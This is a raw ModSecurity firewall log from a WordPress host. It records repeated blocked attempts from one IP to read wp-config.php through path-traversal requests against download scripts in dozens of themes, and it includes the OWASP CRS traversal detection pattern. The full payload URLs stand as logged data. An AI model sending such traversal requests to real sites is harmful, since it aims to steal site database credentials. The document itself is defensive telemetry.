ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acamir-theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acamir-theme/down.php"] [unique_id "Y8DxI6GMrWzzUVMdEhcMCwAAAMw"] [Fri Jan 13 00:50:27.352491 2023] [:error] [pid 31042:tid 140315180599040] [client 185.206.224.212:43108] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/agency/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/agency/down.php"] [unique_id "Y8DxI46vAq65Ygpdg5ObRwAAAFI"] [Fri Jan 13 00:50:27.467374 2023] [:error] [pid 31043:tid 140315130242816] [client 185.206.224.212:43110] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/comune-di-fornelli/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/comune-di-fornelli/down.php"] [unique_id "Y8DxI8x9A9c0KkSpLadQIgAAAJg"] [Fri Jan 13 00:50:27.587603 2023] [:error] [pid 31041:tid 140315138635520] [client 185.206.224.212:43112] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/delia/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/delia/down.php"] [unique_id "Y8DxI8PRCDYHCWWhHpAjvQAAABc"] [Fri Jan 13 00:50:27.703264 2023] [:error] [pid 31476:tid 140315180599040] [client 185.206.224.212:43114] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/g5_helium/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/g5_helium/down.php"] [unique_id "Y8DxI6GMrWzzUVMdEhcMDAAAANI"] [Fri Jan 13 00:50:27.818647 2023] [:error] [pid 31476:tid 140315163813632] [client 185.206.224.212:43116] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hueman/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hueman/down.php"] [unique_id "Y8DxI6GMrWzzUVMdEhcMDQAAANQ"] [Fri Jan 13 00:50:27.953714 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:43120] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kayano/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kayano/down.php"] [unique_id "Y8DxI6GMrWzzUVMdEhcMDgAAAMA"] [Fri Jan 13 00:50:28.077426 2023] [:error] [pid 31476:tid 140315298096896] [client 185.206.224.212:43122] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/pinboard/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/pinboard/down.php"] [unique_id "Y8DxJKGMrWzzUVMdEhcMDwAAAMQ"] [Fri Jan 13 00:50:28.197552 2023] [:error] [pid 31476:tid 140315147028224] [client 185.206.224.212:43124] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/startheme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/startheme/down.php"] [unique_id "Y8DxJKGMrWzzUVMdEhcMEAAAANY"] [Fri Jan 13 00:50:28.317816 2023] [:error] [pid 31043:tid 140315281311488] [client 185.206.224.212:43126] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/tplbs/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/tplbs/down.php"] [unique_id "Y8DxJMx9A9c0KkSpLadQIwAAAIY"] [Fri Jan 13 00:50:28.439284 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:43130] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/godwinsgarage/framework/utilities/download/getfile.php"] [unique_id "Y8DxJKGMrWzzUVMdEhcMEQAAAMg"] [Fri Jan 13 00:50:28.557726 2023] [:error] [pid 31042:tid 140315222562560] [client 185.206.224.212:43132] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/bergsoe/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/bergsoe/download.php"] [unique_id "Y8DxJI6vAq65Ygpdg5ObSAAAAE0"] [Fri Jan 13 00:50:28.682806 2023] [:error] [pid 31476:tid 140315281311488] [client 185.206.224.212:43134] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/customizr/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/customizr/download.php"] [unique_id "Y8DxJKGMrWzzUVMdEhcMEgAAAMY"] [Fri Jan 13 00:50:28.805848 2023] [:error] [pid 31043:tid 140315230955264] [client 185.206.224.212:43138] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Divi/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Divi/download.php"] [unique_id "Y8DxJMx9A9c0KkSpLadQJAAAAIw"] [Fri Jan 13 00:50:28.925660 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:43140] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/focustelecom/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/focustelecom/download.php"] [unique_id "Y8DxJKGMrWzzUVMdEhcMEwAAAM0"] [Fri Jan 13 00:50:29.051143 2023] [:error] [pid 31476:tid 140315272918784] [client 185.206.224.212:43144] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/irmahulscher/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/irmahulscher/framework/utilities/download/getfile.php"] [unique_id "Y8DxJaGMrWzzUVMdEhcMFAAAAMc"] [Fri Jan 13 00:50:29.166808 2023] [:error] [pid 31042:tid 140315188991744] [client 185.206.224.212:43146] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/izerski/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/izerski/download.php"] [unique_id "Y8DxJY6vAq65Ygpdg5ObSgAAAFE"] [Fri Jan 13 00:50:29.295852 2023] [:error] [pid 31043:tid 140315239347968] [client 185.206.224.212:43152] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/kioskpolis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/kioskpolis/download.php"] [unique_id "Y8DxJcx9A9c0KkSpLadQJQAAAIs"] [Fri Jan 13 00:50:29.411697 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:43154] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mantra/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mantra/download.php"] [unique_id "Y8DxJaGMrWzzUVMdEhcMFQAAAMM"] [Fri Jan 13 00:50:29.543040 2023] [:error] [pid 31043:tid 140315214169856] [client 185.206.224.212:43156] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/melrose/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/melrose/download.php"] [unique_id "Y8DxJcx9A9c0KkSpLadQJgAAAI4"] [Fri Jan 13 00:50:29.665264 2023] [:error] [pid 31476:tid 140315256133376] [client 185.206.224.212:43158] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mtb/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mtb/inc/download.php"] [unique_id "Y8DxJaGMrWzzUVMdEhcMFgAAAMk"] [Fri Jan 13 00:50:29.780107 2023] [:error] [pid 31043:tid 140315205777152] [client 185.206.224.212:43160] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/niet/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/niet/download.php"] [unique_id "Y8DxJcx9A9c0KkSpLadQJwAAAI8"] [Fri Jan 13 00:50:29.905451 2023] [:error] [pid 31041:tid 140315147028224] [client 185.206.224.212:43162] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/philippineartawards/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 